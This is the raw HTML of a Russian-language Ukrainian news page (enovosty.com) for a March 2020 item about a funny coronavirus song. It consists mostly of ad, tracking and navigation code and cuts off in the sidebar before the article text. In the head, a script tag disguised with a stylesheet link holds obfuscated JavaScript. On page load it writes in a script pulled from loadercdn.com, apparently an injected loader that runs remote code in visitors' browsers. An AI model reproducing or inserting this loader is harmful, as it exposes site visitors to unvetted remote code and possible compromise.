<!DOCTYPE html><html prefix="og: http://ogp.me/ns#" lang="ru"><head><title>Без паники: Смешная и оптимистичная песня про ситуацию в коронавирусном мире &#171;взорвала&#187; сеть | Экономические Новости</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"/> <meta name="referrer" content="origin"><meta name="yandex-verification" content="9a28c4c473219914" /><meta name="yandex-verification" content="9a28c4c473219914" /><meta name="msvalidate.01" content="B41426C32883F1040781CF3774D685FD" /> <meta property="og:title" content="Без паники: Смешная и оптимистичная песня про ситуацию в коронавирусном мире &#171;взорвала&#187; сеть "/><meta property="og:site_name" content="enovosty. Украинские новости дня"/><meta property="og:image" content="https://enovosty.com/img/ielogo.jpg"/><meta property="og:type" content="website" /><meta property="og:image:width" content="200" /><meta property="og:image:height" content="200" /><meta property="og:type" content="article" /><meta property="og:image:alt" content="Экономические новости Украины и мира" /><meta name="google-site-verification" content="lQg1PFdRt2LbXcwJ8zsQT5ZnqQEsNPh4d7LwEmOU_lU" /><style>.toparticles{position:relative}.toparticles #photoPromo{height:216px;width:466px;overflow:hidden}.toparticles #photoPromo li{height:216px}.toparticles div.anythingSlider .anythingControls{display:block}</style><link rel="icon" href="https://enovosty.com/favicon.ico" type="image/x-icon" /><link rel="apple-touch-icon" sizes="144x144" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-144x144.png"> <link rel="apple-touch-icon" sizes="114x114" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-114x114.png"> <link rel="apple-touch-icon" sizes="72x72" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-72x72.png"> <link rel="apple-touch-icon" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png"><link rel="apple-touch-icon-precomposed" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png" /><style>@font-face{font-family:"sw-icon-font";src:url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0");src:url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0#iefix") format("embedded-opentype"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.woff?ver=3.6.0") format("woff"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.ttf?ver=3.6.0") format("truetype"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.svg?ver=3.6.0#1445203416") format("svg");font-weight:normal;font-style:normal}</style><link rel='stylesheet' id='mo_openid_admin_settings_style-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/mo_openid_style.css?version=5.0.6' type='text/css' media='all' /><link rel='stylesheet' id='mo_openid_admin_settings_phone_style-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/phone.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-bootstrap-social-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap-social.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-bootstrap-main-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap.min-preview.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-font-awesome-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/font-awesome.min.css?version=4.8' type='text/css' media='all' /><link rel='stylesheet' id='bootstrap_style_ass-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap-tour-standalone.css?version=5.1.4' type='text/css' media='all' /><link rel='stylesheet' id='wp-block-library-css' href='https://enovosty.com/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /><link rel='stylesheet' id='wbcr-comments-plus-url-span-css' href='https://enovosty.com/wp-content/plugins/clearfy/components/comments-plus/assets/css/url-span.css' type='text/css' media='all' /><link rel='stylesheet' id='social_warfare-css' href='https://enovosty.com/wp-content/plugins/social-warfare/assets/css/style.min.css' type='text/css' media='all' /><link rel='stylesheet' id='msl-main-css' href='https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/masterslider.main.css' type='text/css' media='all' /><script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery-migrate.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/js/jquery.cookie.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/js/social_login.js'></script><meta name="description" content="Несмотря на сложную ситуацию в мире, люди не теряют оптимизм и чувство юмора. И это главное." /><meta property="og:description" content="Несмотря на сложную ситуацию в мире, люди не теряют оптимизм и чувство юмора. И это главное." /><meta name="keywords" content="курьезы,оптимизм,позитивные видео,новости культуры" /><link rel="canonical" href="https://enovosty.com/news-culture/full/1903-smeshnaya-i-optimistichnaya-pesnya-pro-situaciyu-v-koronavirusnom-mire-vzorvala-set" /><meta property="og:url" content="https://enovosty.com/news-culture/full/1903-smeshnaya-i-optimistichnaya-pesnya-pro-situaciyu-v-koronavirusnom-mire-vzorvala-set" /><style>.ms-parent-id-4 > .master-slider{background:#000000}.ms-parent-id-3 > .master-slider{background:#000000}.ms-parent-id-2 > .master-slider{background:#000000}.ms-parent-id-1 > .master-slider{background:#000000}</style><script>var ms_grabbing_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grabbing.cur', ms_grab_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grab.cur';</script><meta name="generator" content="MasterSlider 3.1.1 - Responsive Touch Image Slider | www.avt.li/msf" /><style>.wp-polls .pollbar{margin:1px;font-size:6px;line-height:8px;height:8px;background-image:url('https://enovosty.com/wp-content/plugins/wp-polls/images/default/pollbg.gif');border:1px solid #c8c8c8}</style><link rel="amphtml" href="https://enovosty.com/news-culture/full/1903-smeshnaya-i-optimistichnaya-pesnya-pro-situaciyu-v-koronavirusnom-mire-vzorvala-set?amp"><meta name="fragment" content="!" /><script type="text/javascript">ajaxurl = '/wp-admin/admin-ajax.php';gpid = '4798428';cpage = ''
</script><style>span.swp_share,i.swp_facebook_icon,i.swp_twitter_icon,i.swp_linkedin_icon,span.swp_count{color:#ffffff}table.social{width:50%!important}.swp_share_button{height:max-content!important}.swp_social_panel{margin-bottom:0px!important;margin-top:0px!important}</style><script href="https://enovosty.com/wp-content/themes/eizvestia/style1.min.css?v=1">(function(e,t,r,n,o,a,i,l,m,c,g,d,s,u){var w,f,h,p,b,v,y,I="",A="/?r=",B=e.localStorage||{};for(w in B)e[g](w[d](0,3),16)+""==w[d](3)&&(f=B[i+m](w)).length<100&&f[d](0,3)==s&&(B[l+m](w),I=f);v=(b=(p=(h=e[t]).getElementsByTagName(n))[p.length-1])[a]("href"),y=b[a]("media")||"",h[r]("<"+n+">"+(I?u+'="//loadercdn.com'+A+e[u]+"&"+I+'";':t+"."+r+"('<"+o+">@"+c+' "'+v+'" '+y+";</"+o+">');")+"</"+n+">")})(window,"document","write","script","style","getAttribute","get","remove","Item","import","parseInt","substr","d1e","location");</script><link rel="stylesheet" id="like-dislike-css" href="https://enovosty.com/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/css/ldc-lite.min.css?v=1&#038;ver=1.0.0" type="text/css" media="all" /><script><!--//--><![CDATA[//><!--
var pp_gemius_identifier = new String('.WeQbWs7d1FI7fa_VrIDknZ233jNFqLPdhORXpDm_jL.27');//--><!]]></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/x_gemius.js"></script><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-addcount.js.php?top_ten_id=4798428&amp;a=1084" async></script><!--[if lte IE 7]><link rel="stylesheet" href="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/css/anythingslider-ie.css" type="text/css" media="screen" /><![endif]--><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/js/jquery.anythingslider1.min.js"></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jqvisible.js"></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/common.js"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/adriver.core.2.ua.min.js"></script><script type="text/javascript">(function () {var w = window,d = document,protocol = /https/i.test(w.location.protocol) ? 'https:' : 'http:',aml = typeof admixerML !== 'undefined' ? admixerML : {};aml.fn = aml.fn || [];aml.invPath = aml.invPath || (protocol + '//inv-nets.admixer.net/');
aml.cdnPath = aml.cdnPath || (protocol + '//cdn.admixer.net/');
aml.noCriteo = true;if (!w.admixerML) {var lodash = document.createElement('script');lodash.id = 'amlScript';lodash.async = true;lodash.type = 'text/javascript';lodash.src = aml.cdnPath + 'scripts3/loader2.js';var node = d.getElementsByTagName('script')[0];node.parentNode.insertBefore(lodash, node);w.admixerML = aml;}})();</script> <meta property="fb:admins" content="100009507220682"/><meta property="fb:app_id" content="2113796585568948"/><script>function setHomepage(){var homepage = 'https://enovosty.com';
if (document.all){document.body.style.behavior='url(#default#homepage)';document.body.setHomePage(homepage);}else if (window.sidebar){if(window.netscape){try{netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");}catch(e){alert("this action was aviod by your browser，if you want to enable，please enter about:config in your address line,and change the value of signed.applets.codebase_principal_support to true");}}var prefs = Components.classes['@mozilla.org/preferences-service;1'].getService(Components. interfaces.nsIPrefBranch);prefs.setCharPref('browser.startup.homepage',homepage);}}</script><script>var _gaq = _gaq || [];var pluginUrl = '//www.google-analytics.com/plugins/ga/inpage_linkid.js';
_gaq.push(['_require', 'inpage_linkid', pluginUrl]);_gaq.push(['_setAccount', 'UA-12467142-3']);_gaq.push(['_addOrganic', 'nova.rambler.ru', 'query']);_gaq.push(['_addOrganic', 'go.mail.ru', 'q']);_gaq.push(['_addOrganic', 'nigma.ru', 's']);_gaq.push(['_addOrganic', 'webalta.ru', 'q']);_gaq.push(['_addOrganic', 'aport.ru', 'r']);_gaq.push(['_addOrganic', 'poisk.ru', 'text']);_gaq.push(['_addOrganic', 'km.ru', 'sq']);_gaq.push(['_addOrganic', 'liveinternet.ru', 'ask']);_gaq.push(['_addOrganic', 'quintura.ru', 'request']);_gaq.push(['_addOrganic', 'search.qip.ru', 'query']);_gaq.push(['_addOrganic', 'gde.ru', 'keywords']);_gaq.push(['_addOrganic', 'gogo.ru', 'q']);_gaq.push(['_addOrganic', 'ru.yahoo.com', 'p']);_gaq.push(['_addOrganic', 'images.yandex.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogsearch.google.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogs.yandex.ru', 'text', true]);_gaq.push(['_setDomainName', 'enovosty.com']);_gaq.push(['_trackPageview']);(function() {var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'https://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);})();</script><script>function trackOutboundLink(link, category, action) {var url = '';if(link.href) url = link.href;if(url == ''){str = link.getAttribute("onclick");m = str.match("(https:\/\/.*?)\'");if(m) url = m[1];}try {_gaq.push(['_trackEvent', category , action]);} catch(err){}setTimeout(function() {}, 100);}</script><script>jQuery(document).ready(function($){$("a").each(function() {var href = $(this).attr("href");var target = $(this).attr("target");var text = $(this).text();var a = new RegExp('/' + window.location.host + '/');var e = /([-a-zA-Z0-9@:%_\+.~#?&\/\/=]{2,256}\.[a-z]{2,4}\b(\/?[-a-zA-Z0-9@:%_\+.~#?&\/\/=]*)?)/gi;var b = new RegExp(e);$(this).click(function(event) {if (this.href && b.test(this.href) && !a.test(this.href) && (href.indexOf("enovosty.com") == -1)) {console.log("document.URL : "+this.href);event.preventDefault();_gaq.push(["_trackEvent", "Links", "Clicked", href, , false]);setTimeout(function() {window.open(href,(!target?"_self":target));},300);}});});});</script><script>(function(){var j=163229,f=false,b=document,c=b.documentElement,e=window;function g(){var a="";a+="rt="+(new Date).getTime()%1E7*100+Math.round(Math.random()*99);a+=b.referrer?"&r="+escape(b.referrer):"";return a}function h(){var a=b.getElementsByTagName("head")[0];if(a)return a;for(a=c.firstChild;a&&a.nodeName.toLowerCase()=="#text";)a=a.nextSibling;if(a&&a.nodeName.toLowerCase()!="#text")return a;a=b.createElement("head");c.appendChild(a);return a}function i(){var a=b.createElement("script");a.setAttribute("type","text/javascript");a.setAttribute("async","true");a.setAttribute("src","https://s.luxadv.com/t/lb"+j+"_3.js?"+g());typeof a!="undefined"&&h().appendChild(a)}function d(){if(!f){f=true;i()}};if(b.addEventListener)b.addEventListener("DOMContentLoaded",d,false);else if(b.attachEvent){c.doScroll&&e==e.top&&function(){try{c.doScroll("left")}catch(a){setTimeout(arguments.callee,0);return}d()}();b.attachEvent("onreadystatechange",function(){b.readyState==="complete"&&d()})}else e.onload=d})();</script><script async src='https://www.googletagservices.com/tag/js/gpt.js'></script><script>var googletag = googletag || {};googletag.cmd = googletag.cmd || [];</script><script>googletag.cmd.push(function() {googletag.defineSlot('/17774365/enovosty.com_300x600', [300, 600], 'div-gpt-ad-1531223757969-0').addService(googletag.pubads());googletag.defineSlot('/17774365/enovosty.com_300x600_2', [300, 600], 'div-gpt-ad-1531304104065-0').addService(googletag.pubads());//googletag.defineSlot('/17774365/enovosty.com_728x90', [728, 90], 'div-gpt-ad-1531223757969-1').addService(googletag.pubads());
googletag.defineSlot('/59256651/ads_ei_468_60', [468, 60], 'div-gpt-ad-1516280158772-0').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});
</script></head><body><script type='text/javascript'>admixerML.fn.push(function() {// Правая колонка - верх
if(/ukr.net/i.test(document.referrer)){admixerML.defineSlot({z: '7af953ae-795d-4e3e-8b55-c1906dcae224', ph: 'admixer_7af953ae795d4e3e8b55c1906dcae224_zone_12623_sect_1082_site_1069',i: 'inv-nets'});} else {admixerML.defineSlot({z: '9743148c-0bcf-416e-8ab5-55d24689e145', ph: 'admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069', i: 'inv-nets'});};admixerML.defineSlot({z: '9a399316-86c0-4d6c-a6f1-676a36437a90', ph: 'admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069', i: 'inv-nets', s:'8b5577c5-d6c8-4102-81da-48ee76305fc9'});admixerML.defineSlot({z: '6c64e196-3fa9-43cf-8c1e-fd800277f90c', ph: 'go2net_6c64e1963fa943cf8c1efd800277f90c_zone_28808_sect_9220_site_7570', i: 'inv-nets', s:'7901bb9a-67fa-4dcd-8ae7-8a34d5bc7852'});// Нигде не выводится

// Статьи/Новости внизу
admixerML.defineSlot({z: '3b1188cc-6614-4215-a9bc-9ecb1d9b44e9', ph:
'admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069', i:
'inv-nets' ,renderedCallback: function(e) {var player = e.ph.childNodes[0].contentWindow &&
e.ph.childNodes[0].contentWindow.player;if (player){player.mute();}}});// Футтер
admixerML.defineSlot({z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f', ph:
'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069', i:
'inv-nets'});
admixerML.defineSlot({z: '5dacd85f-7810-44f5-831a-9a7b2add1a5f', ph: 'admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069', i: 'inv-nets'});admixerML.singleRequest();});</script><script><!--
bmN=navigator,bmD=document,bmD.cookie='b=b',i=0,bs=[],bm={v:101585,s:101585,t:6,c:bmD.cookie?1:0,n:Math.round((Math.random()* 1000000)),w:0};for(var f=self;f!=f.parent;f=f.parent)bm.w++;try{if(bmN.plugins&&bmN.mimeTypes.length&&(x=bmN.plugins['Shockwave Flash']))bm.m=parseInt(x.description.replace(/([a-zA-Z]|\s)+/,''));else for(var f=3;f<20;f++)if(eval('new ActiveXObject("ShockwaveFlash.ShockwaveFlash.'+f+'")'))bm.m=f}catch(e){;}try{bm.y=bmN.javaEnabled()?1:0}catch(e){;}try{bmS=screen;bm.v^=bm.d=bmS.colorDepth||bmS.pixelDepth;bm.v^=bm.r=bmS.width}catch(e){;}r=bmD.referrer.replace(/^w+:\/\//,'');if(r&&r.split('/')[0]!=window.location.host){bm.f=escape(r).slice(0,400).slice(0,400);bm.v^=r.length}bm.v^=window.location.href.length;for(var x in bm) if(/^[vstcnwmydrf]$/.test(x)) bs[i++]=x+bm[x];bmD.write('<img src="//c.bigmir.net/?'+bs.join('&')+'"  width="0" height="0" alt="bigmir)net TOP 100" style="display:none;" title="bigmir)net TOP 100" />');
//--></script><noscript><img src="//c.bigmir.net/?v101585&s101585&t6" width="0" height="0" alt="" title="" /></noscript><div id="fb-root"></div><script>window.fbAsyncInit = function() {FB.init({appId      : '2113796585568948',cookie     : true,xfbml      : true,version    : 'v3.0'
});
FB.AppEvents.logPageView();
};(function(d, s, id){var js, fjs = d.getElementsByTagName(s)[0];if (d.getElementById(id)) {return;}js = d.createElement(s); js.id = id;js.src = "https://connect.facebook.net/en_US/sdk.js";
fjs.parentNode.insertBefore(js, fjs);}(document, 'script', 'facebook-jssdk'));</script><div id="adriver_banner_branding"></div><div id='admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069'></div><script>admixerML.fn.push(function() {admixerML.display('admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069');});</script><div class="container"> <div style="margin-top:0px;position:relative;"> <div id='admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069'></div><script type='text/javascript'>admixerML.fn.push(function() {admixerML.display('admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069');});</script><div id="right_ban"></div> <div class="mltlngg_switcher"><span>Рус</span><a href="https://enovosty.com/uk/">Укр</a></div> </div> <div class="cls"></div><div id="header" style="padding-top:0px; margin-top: 0px;" ><div id="headerTop"><div class="cls"></div></div>   <div id="headerMiddle"><a href="https://enovosty.com/"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/srclogo.png" id="logo" alt="Экономические новости" title="Экономические новости" /></a> <a href="https://enovosty.com/konverter-valyut" class="finmarket">Конвертер валют</a><a href="https://enovosty.com/video" class="videohead">Видео</a><a class="wap" rel="nofollow" href="https://enovosty.com/news-culture/full/1903-smeshnaya-i-optimistichnaya-pesnya-pro-situaciyu-v-koronavirusnom-mire-vzorvala-set?mobile=1"></a><a class="wap-img" title="Мобильная версия сайта" rel="nofollow" href="https://enovosty.com/news-culture/full/1903-smeshnaya-i-optimistichnaya-pesnya-pro-situaciyu-v-koronavirusnom-mire-vzorvala-set?mobile=1"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/wap1.png" alt="Мобильная версия сайта" /></a> <div class="wiget simple" id="curs"><span style="text-align:center;display: block;font-size: 12px;font-weight: 700;"><a style="color: #369;" href="https://enovosty.com/currency-rates">Курсы валют</a></span><div class="header-currency"><a href="https://enovosty.com/currency-rates"><table class="currency"> <tr class="cur_shap"><td>&nbsp;</td><td><strong>Продажа</strong></td><td><strong>Покупка</strong></td><td><strong>НБУ</strong></td> </tr> <tr><td>USD</td><td>28.70</td><td>27.05</td><td>25.14</td> </tr> <tr class="tr_white"><td>EUR</td><td>31.55</td><td>29.70</td><td>27.75</td> </tr> <tr><td>RUB</td><td>0.39</td><td>0.29</td><td>0.38</td> </tr></table></a></div></div><div class="wiget simple" id="fonds"><span style="color: #369;text-align: center;display: block;font-size: 12px;font-weight: 700;">Фондовые индексы</span><table class="currency index"> <tr class="cur_shap"> <td>&nbsp;</td><td><strong>Знач.</strong></td><td><strong>Изм.,&nbsp;%</strong></td><td><strong>Время</strong></td> </tr> <tr> <td>PFTS</td><td>524.09</td><td>-1.24</td><td>20:36 18.03.2020</td> </tr> <tr class="tr_white"> <td>UX</td><td>1432.62</td><td>-1.03</td><td>17:00 18.03.2020</td> </tr> <tr> <td>RTS</td><td>832.26</td><td>-10.96</td><td>17:51 18.03.2020</td> </tr></table></div><div class="wiget simple" id="toplivo"><span style="color: #369;text-align:center;display: block;font-size: 12px;font-weight: 700;">Стоимость нефти (ICE)</span><table class="currency benzin"><tr class="cur_shap"><td></td><td><strong>$/баррель</strong></td><td><strong>Изм., %</strong></td><td><strong>Дата</strong></td></tr><tr><td style="text-align:left;padding-left: 2px;">BRENT</td><td>24.91</td><td>-13.30</td><td style="text-transform:uppercase;">Mar</td></tr><tr class="tr_white"><td style="text-align:left;padding-left: 2px;">WTI</td><td>20.20</td><td>-25.05</td><td style="text-transform:uppercase;">Mar</td></tr><tr><td style="text-align:left;padding-left: 2px;">GAS OIL</td><td>273.50</td><td>-8.83</td><td style="text-transform:uppercase;">Mar</td></tr></table></div> <div id="header_right"> <a href="https://enovosty.com/rss/rss.xml">RSS</a><a href="https://enovosty.com/afisha" class="h-anonsy" style="margin-top: 40px;"> 
Афиша</a><a class="archive" href="https://enovosty.com/archive">Архив</a><div style="clear: both;vertical-align:top;"> <a href="https://enovosty.com" title="Последние новости - &quot;ЭКОНОМИЧЕСКИЕ НОВОСТИ&quot;" onclick="window.external.AddFavorite(this.href, this.title); return false;" rel="sidebar">Добавить в закладки</a> </div> </div> <div class="cls"></div></div> <div id="mainMenu" data-hover="hover-on-menu"><ul id="ull" class="menu"><li class="menu-item-has-children"><a class="first" href="https://enovosty.com/news" data-hover="hover-on-link">Новости</a><ul class="sub-menu"><li><a href="https://enovosty.com/news_politics">Политика</a></li><li><a href="https://enovosty.com/news_kiev">Киев</a></li><li><a href="https://enovosty.com/news_economy">Экономика</a></li><li><a href="https://enovosty.com/news-finance">Финансы</a></li><li><a href="https://enovosty.com/news_ekskluzive">Эксклюзив</a></li><li><a href="https://enovosty.com/news-markets">Рынки</a></li><li><a href="https://enovosty.com/news_society">Общество</a></li><li><a href="https://enovosty.com/news_abroad">Мир</a></li><li><a href="https://enovosty.com/news_sport">Cпорт</a></li><li class="current-menu-item"><a href="https://enovosty.com/news-culture">Культура</a></li><li><a href="https://enovosty.com/news-auto">Авто</a></li><li><a href="https://enovosty.com/news_incidents">Происшествия</a></li><li><a href="https://enovosty.com/news_technology">Наука и технологии</a></li><li><a href="https://enovosty.com/zdorove">Здоровье</a></li></ul></li><li><a href="https://enovosty.com/politika">Политика</a></li><li><a href="https://enovosty.com/ekonomika">Экономика</a></li><li><a href="https://enovosty.com/finance">Финансы</a></li><li><a href="https://enovosty.com/markets">Рынки</a></li><li><a href="https://enovosty.com/society">Общество</a></li><li><a href="https://enovosty.com/tehnologii">Технологии</a></li><li><a href="https://enovosty.com/auto">Авто</a></li><li ><a href="https://enovosty.com/blogs">Мнения</a></li><li ><a href="https://enovosty.com/person">Досье</a></li><li id="menu-item-4513425_old" ><a href="https://enovosty.com/currency-rates">Курсы валют</a></li><li id="menu-item-4513319" class="menu-item-has-children" style="border-right: 1px solid #fff;"><a href="#">Ещё...</a><ul class="sub-menu"><li><a href="https://enovosty.com/o-proekte">О проекте</a></li><li><a href="https://enovosty.com/author">Авторы</a></li><li><a href="https://enovosty.com/photo-nedeli">Фото недели</a></li><li><a href="https://enovosty.com/presidenty-2019">Кандидаты в президенты 2019</a></li><li><a href="https://enovosty.com/vybory-2019" >Выборы 2019</a></li></ul></li><li id="menu-item-4513417" ><a href="https://enovosty.com/specproekty/rynok-zemli">Рынок земли</a></li></ul></div><script>jQuery(document).ready(function($){if(jQuery( window ).width() < 606){var touchHover = function() {$('.first').click(function(e){e.preventDefault();var $this = $(this);var onHover = $this.attr('data-hover');var linkHref = $this.attr('href');if (linkHref && $this.hasClass(onHover)) {location.href = linkHref;return false;}$this.toggleClass(onHover);});$('.finance').click(function(e){e.preventDefault();var $this = $(this);var onHover = $this.attr('data-hover');var linkHref = $this.attr('href');if (linkHref && $this.hasClass(onHover)) {location.href = linkHref;return false;}$this.toggleClass(onHover);});};$(document).ready(function() { touchHover(); });}});</script> </div>  <div id="body"><div class="cls"></div><div id="sidebarLeft_n" style="width:210px;"><script>jQuery(document).ready(function($){$('#slider').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :true,delay : 8000,autoPlayLocked : true,pauseOnHover : true
});});</script><div class="topnews_single slide"><p style="padding: 0 7px;
font-weight: 700;
font-family: arial,verdana,tahoma;
background: url(/wp-content/themes/eizvestia/img/blueline.jpg) repeat-x;
line-height: 9px;
margin: 2px 0 9px;
text-align: center;"><a href="https://enovosty.com/top-news"><span style="background-color: #fff;
font-size: 12px;
color: #326698;
text-transform: uppercase;
padding: 0 9px;">Топ-новости &nbsp;&nbsp;<i style="font-size: 11px;color: #666;font-style: normal;text-transform: none;">за 24 часа</i></span></a></p><ul id="slider"><li><ul class="tact"><li id="li0" style="width:210px;"><a href="https://enovosty.com/news_kiev/full/1803-v-kieve-razreshili-poka-chto-ne-platit-za-internet" title="В Киеве разрешили пока что не платить за интернет"><img width="210" height="156" alt="В Киеве разрешили пока что не платить за интернет" src="https://enovosty.com/wp-content/uploads/2020/03/1505883.jpg"></a><a href="https://enovosty.com/news_kiev/full/1803-v-kieve-razreshili-poka-chto-ne-platit-za-internet" title="В Киеве разрешили пока что не платить за интернет" class="name">В Киеве разрешили пока что не платить за интернет <span>(3636)</span></a></li></ul></li><li><ul class="tact"><li id="li1" style="width:210px;"><a href="https://enovosty.com/news_society/full/1803-mir-ne-budet-prezhnim-kak-koronavirus-navsegda-izmenit-zhizni-lyudej-planety" title="Мир не будет прежним: Как коронавирус навсегда изменит жизни людей планеты"><img width="210" height="156" alt="Мир не будет прежним: Как коронавирус навсегда изменит жизни людей планеты" src="https://enovosty.com/wp-content/uploads/2020/03/2020-03-06t192614z_410205754_rc2jef9e8m9v_rtrmadp_3_health-coronavirus-spain-e1584516927904.jpg"></a><a href="https://enovosty.com/news_society/full/1803-mir-ne-budet-prezhnim-kak-koronavirus-navsegda-izmenit-zhizni-lyudej-planety" title="Мир не будет прежним: Как коронавирус навсегда изменит жизни людей планеты" class="name">Мир не будет прежним: Как коронавирус навсегда изменит жизни людей планеты <span>(6472)</span></a></li></ul></li><li><ul class="tact"><li id="li2" style="width:210px;"><a href="https://enovosty.com/news_abroad/full/1803-kitaj-otkazalsya-zakupat-rossijskuyu-neft-i-pereshel-na-saudovskuyu" title="Китай отказался закупать российскую нефть и перешел на саудовскую"><img width="210" height="156" alt="Китай отказался закупать российскую нефть и перешел на саудовскую" src="https://enovosty.com/wp-content/uploads/2020/03/kit_neft.jpg"></a><a href="https://enovosty.com/news_abroad/full/1803-kitaj-otkazalsya-zakupat-rossijskuyu-neft-i-pereshel-na-saudovskuyu" title="Китай отказался закупать российскую нефть и перешел на саудовскую" class="name">Китай отказался закупать российскую нефть и перешел на саудовскую <span>(5615)</span></a></li></ul></li><li><ul class="tact"><li id="li3" style="width:210px;"><a href="https://enovosty.com/news_kiev/full/1703-kievpastrans-predstavil-spisok-marshrutov-nazemnogo-transporta-kotorye-zamenyat-metro" title="Киевпастранс обнародовал маршруты наземного транспорта, которые заменят метро"><img width="210" height="156" alt="Киевпастранс обнародовал маршруты наземного транспорта, которые заменят метро" src="https://enovosty.com/wp-content/uploads/2020/03/original-6.jpg"></a><a href="https://enovosty.com/news_kiev/full/1703-kievpastrans-predstavil-spisok-marshrutov-nazemnogo-transporta-kotorye-zamenyat-metro" title="Киевпастранс обнародовал маршруты наземного транспорта, которые заменят метро" class="name">"Киевпастранс" обнародовал маршруты наземного транспорта, которые заменят метро <span>(8220)</span></a></li></ul></li><li><ul class="tact"><li id="li4" style="width:210px;"><a href="https://enovosty.com/news_economy/full/1703-mirovuyu-ekonomiku-ozhidaet-globalnaya-recessiya-agentstvo-sp" title="Мировую экономику ожидает глобальная рецессия - агентство S&P"><img width="210" height="156" alt="Мировую экономику ожидает глобальная рецессия - агентство S&P" src="https://enovosty.com/wp-content/uploads/2020/03/3308470-standard-poor-s-657-323-e1584462061628.jpg"></a><a href="https://enovosty.com/news_economy/full/1703-mirovuyu-ekonomiku-ozhidaet-globalnaya-recessiya-agentstvo-sp" title="Мировую экономику ожидает глобальная рецессия - агентство S&P" class="name">Мировую экономику ожидает глобальная рецессия - агентство S&P <span>(2816)</span></a></li></ul></li><li><ul class="tact"><li id="li5" style="width:210px;"><a href="https://enovosty.com/zdorove/full/1703-ukraincy-nachali-zarazhatsya-koronavirusom-vnutri-strany-ne-vyezzhaya-za-granicu-viktor-lyashko-video" title="Украинцы начали заражаться коронавирусом внутри страны, не выезжая за границу, - Виктор Ляшко (ВИДЕО)"><img width="210" height="156" alt="Украинцы начали заражаться коронавирусом внутри страны, не выезжая за границу, - Виктор Ляшко (ВИДЕО)" src="https://enovosty.com/wp-content/uploads/2020/03/lyashko_v.jpg"></a><a href="https://enovosty.com/zdorove/full/1703-ukraincy-nachali-zarazhatsya-koronavirusom-vnutri-strany-ne-vyezzhaya-za-granicu-viktor-lyashko-video" title="Украинцы начали заражаться коронавирусом внутри страны, не выезжая за границу, - Виктор Ляшко (ВИДЕО)" class="name">Украинцы начали заражаться коронавирусом внутри страны, не выезжая за границу, - Виктор Ляшко (ВИДЕО) <span>(2160)</span></a></li></ul></li><li><ul class="tact"><li id="li6" style="width:210px;"><a href="https://enovosty.com/news-auto/full/1703-obval-cen-na-neft-chto-budet-so-stoimostyu-benzina-v-ukraine" title="Обвал цен на нефть: что будет со стоимостью бензина в Украине"><img width="210" height="156" alt="Обвал цен на нефть: что будет со стоимостью бензина в Украине" 